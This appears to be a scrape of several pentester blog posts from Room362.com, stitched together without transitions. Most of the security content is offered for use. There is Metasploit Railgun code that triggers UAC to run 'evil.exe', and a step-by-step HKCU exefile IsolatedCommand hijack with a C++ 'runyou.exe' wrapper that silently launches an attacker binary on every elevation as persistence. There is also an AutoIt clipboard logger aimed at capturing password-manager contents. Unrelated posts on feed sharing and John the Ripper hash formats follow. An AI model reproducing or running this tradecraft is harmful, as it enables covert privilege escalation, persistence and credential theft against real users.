Room362.com

A number of times during tests I've actually run into those mythical creatures called "patched windows machines". At DerbyCon Chris Gates and I released the "Ask" post module (which I had failed to publish). This module very simply uses the ShellExecute windows function via Railgun with the undocumented (but very well known) operator of 'runas'. These two lines accomplished that:

client.railgun.add_function( 'shell32', 'ShellExecuteA', 'DWORD',[["DWORD","hwnd","in"],["PCHAR","lpOperation","in"],["PCHAR","lpFile","in"],["PCHAR","lpParameters","in"],["PCHAR","lpDirectory","in"],["DWORD","nShowCmd","in"],])
client.railgun.shell32.ShellExecuteA(nil,"runas","evil.exe",nil,nil,5)

This would quite simply prompt the user with that annoying UAC prompt asking the user to run 'evil.exe' with Administrative privs. If they are not "Admins" themselves then it would prompt them for the user name and password (normally the case in systems attached to domains). Something to be aware of: If your evil.exe is not code-signed the UAC box will be orange instead of blue. You can get around this a bit by using rundll32.exe (which is signed ;-) ) as is svchost.exe. (You may also want to not name it evil.exe)

The downfall here is that 1. You have to drop a binary (boooo) 2. You are prompting the user for UAC control when they didn't do anything to cause it. Users are generally as smart as bait, but it's good practice to assume to the contrary. If for nothing else other than to challenge yourself to up your game.

Number 1 I'll leave to another post, so lets solve #2.

When a "runas" ShellExecute (which UAC runs natively #hint#hint) a few registry locations are checked. One I'd like to point out is the HKLM\Software\Classes\exefile key. The 'exefile' as should be obvious is the registry settings for executables, and as such tells Windows how to interact with them. In HKLM (which is only writable by Administrators) the "shell\open", "shell\runas" and "shell\runasuser" subkeys exist (the structure looks oddly familiar to anyone who visited the ShellExecute page more than once). Inside "shell\open\command" the default string has "%1" %*  - this basically means execute the binary %1 and hand the arguments given directly to it %*. Awesome! From here you can alter how every EXE runs on the system (don't do it, Windows doesn't like you afterwards, trust me, and remember to snapshot if you don't). 

Great, but how does this help us, we aren't admins. HKCU is writable by the 'Current User' hence the name, and it so happens to have a very similar registry path: HKCU\Software\Classes. Depending on your system, it may or may not have a "exefile" subkey. If it doesn't it's pretty easy to create. Lets make it match the "runas" one in HKLM

The tree should look something like this when you are done:

• HKLM
  • Software
    • Classes
      • exefile
        • shell
          • runas
            • command

Under command change the default value to "%1" %* just as it is in HKLM, and add a new String value called 'IsolatedCommand' with the same value as default. With these settings, very little has changed on the system or its operation. However, if we change the 'IsolatedCommand' String to 'notepad.exe' and attempt to 'Run As Administrator' on that system using any binary guess what happens? Notepad! (as Admin). w00t. Now we can swap in our evil.exe and bob wins right? Sorta. We still have that horrible problem of stealth. Whatever the user was trying to UAC up won't work, and they'll try it again, and start investigating the problem, which we don't want them to do.

Enter 'runyou.exe', it's some very simple C++ that weighs in at a whopping 8k when compiled (probably could loose some weight by those who know better compiler options):

#include "windows.h"
#include "stdio.h"
#include "tchar.h"

int _tmain(int argc, _TCHAR* argv[])
{
    if (argv[1])
    {
        ShellExecuteW(NULL,NULL,argv[1],NULL,NULL,SW_SHOW);
        if (argv[2])
        {
            ShellExecuteW(NULL,NULL,argv[2],NULL,NULL,SW_HIDE);
        }
    }
    return 0;
}

This code executes the first program visibly and then the second hidden. You probably see where this is going, but we change our IsolatedCommand String to runyou.exe %1 evil.exe and now we give them exactly what they want in an elevated state, but also get our evil binary there too ;-)

The very real down side to this is you have to wait for the user to use UAC (this does not work if someone else does, it's only for the current user HKCU). But, as a side benefit, it's a very real form of sneaky persistence as well, as it will execute our evil binary every single time they use UAC.

Game Over... ;-)

Since it's Christmas and all, I thought I'd post the code snippet from my Hak5 segment a bit early:

#include <Clipboard.au3>
#include <File.au3>
$oldclip = ""
While 1
    $clip = _ClipBoard_GetData()
    If $clip <> "0" Then
        If $clip <> $oldclip Then
            _FileWriteLog(@UserProfileDir & "\clip.log", $clip)
            $oldclip = $clip
        EndIf
    EndIf
    Sleep(100)
WEnd

It's pretty straight forward, and I welcome everyone to install AutoIt3 and compile/run the above script to see what it does (although most of you I'm sure can figure it out just by reading it).

(Think KeePass, 1Password, LastPass...)

When Google Reader decided to remove everything it was good for, we all scrambled to find new homes for things we wanted to share. Tumblr became a place that most of us flocked. I’ve found Tumblr to be not a very good substitue for Google Reader’s functionality (IMHO). 

The other day, carnal0wnage told me about a service called ‘Buffer’, and all this thing does is do scheduled tweets, but it has one distinct feature, not only is it focused around the sharing of links, it works (if you install the browser plugin/extension) INSIDE OF GOOGLE READER ;-) So you can be reading a feed item, push a button and not have to open a page or another app, it’s pretty much all right there.

I know what you’re thinking, cool, but no big deal right? It goes to twitter, and not to a feed that someone can subscribe to. You’re right, and I fought all day trying to figure that part out and finally came up with a twitter search for my tweets and a special hashtag I would use for my shared links. I found the RSS feed for that search and it looks like this:

http://search.twitter.com/search.atom?q=from%3Amubix%20%23SharedLinks

obviously, this isn’t the easiest or pretty link to send around, so instead I pumped that into Feedburner and now have this for a feed link:

http://feeds.feedburner.com/MubixLinks

Much easier to share, with one AMAZING added bonus. I can switch the feed that powers it at any time, so from now on, no matter if I use Tumblr or Google Reader (after they unjack themselves) or G+ (if they finally set up a feed for +1’d items), that will always be the link to items that I’ve personally liked and wanted to share.

I encourage you to do the same, and leave a comment, so that I can follow your feed back!

Oh, and sign up for Buffer here (w/ my referal link ;) http://bufferapp.com/r/7e450

Pentest Monkey is a great resource for a lot of things. One of which is this:

John The Ripper Hash Formats | pentestmonkey

I used it, plus a bit of bash fu to try to figure out some hashes that I was trying to crack.

Step 1: Create file of supported hash types. For me, that was simple I just threw the following in 'supported_types.txt' in the same directory as john.

DES
BSDI
MD5
BF
AFS
LM
NT
XSHA
PO
raw-MD5
MD5-gen
IPB2
raw-sha1
md5a
hmac-md5
phpass-md5
KRB5
bfegg
nsldap
ssha
openssha
oracle
oracle11
MYSQL
mysql-sha1
mscash
lotus5
DOMINOSEC
NETLM
NETNTLM
NETLMv2
NETNTLMv2
NETHALFLM
mssql
mssql05
epi
phps
mysql-fast
pix-md5
sapG
sapB
md5ns
HDAA

Our first day of No Starch winner is Russ with Room 362 right next to the Fire Hose ;-)

1st Day of @NoStarch Winner